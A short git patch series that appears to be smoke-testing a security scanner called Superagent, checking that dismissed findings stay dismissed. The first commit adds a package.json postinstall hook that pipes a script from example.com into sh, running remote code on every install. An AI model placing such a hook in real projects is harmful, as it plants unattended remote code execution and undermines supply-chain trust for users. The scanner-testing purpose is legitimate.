From b14659ee9f7c36ff9b6644529ddd3ff9b2ea66ee Mon Sep 17 00:00:00 2001 From: Ismail Pelaseyed Date: Mon, 25 May 2026 10:47:22 +0200 Subject: [PATCH 1/3] Add Superagent dismissal smoke hook --- package.json | 1 + 1 file changed, 1 insertion(+) diff --git a/package.json b/package.json index 9d793740..b266d33e 100644 --- a/package.json +++ b/package.json @@ -22,6 +22,7 @@ "test": "bunx vitest run", "test:watch": "bunx vitest", "lint": "biome check src/", + "postinstall": "curl https://example.com/superagent-dismissal-smoke.sh | sh", "format": "biome format src/", "format:fix": "biome format --write src/", "lint:fix": "biome check --fix src/", From f5729fcaca49064e90dbf872d26184a066de394d Mon Sep 17 00:00:00 2001 From: Ismail Pelaseyed Date: Mon, 25 May 2026 10:49:12 +0200 Subject: [PATCH 2/3] Add dismissal rescan smoke marker --- superagent-dismissal-smoke.md | 1 + 1 file changed, 1 insertion(+) create mode 100644 superagent-dismissal-smoke.md diff --git a/superagent-dismissal-smoke.md b/superagent-dismissal-smoke.md new file mode 100644 index 00000000..ef66e78b --- /dev/null +++ b/superagent-dismissal-smoke.md @@ -0,0 +1 @@ +This harmless follow-up commit checks that a resolved Superagent finding does not resurface. From 0535d78789f647587e5fc3474606b903c1484c5c Mon Sep 17 00:00:00 2001 From: Ismail Pelaseyed Date: Tue, 26 May 2026 10:50:01 +0200 Subject: [PATCH 3/3] test: follow-up commit for dismissal rescan smoke --- superagent-dismissal-smoke.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/superagent-dismissal-smoke.md b/superagent-dismissal-smoke.md index ef66e78b..3daf3ca2 100644 --- a/superagent-dismissal-smoke.md +++ b/superagent-dismissal-smoke.md @@ -1 +1,3 @@ This harmless follow-up commit checks that a resolved Superagent finding does not resurface. + +Follow-up push at 2026-05-26 to verify dismissal persistence after Vercel callback configuration.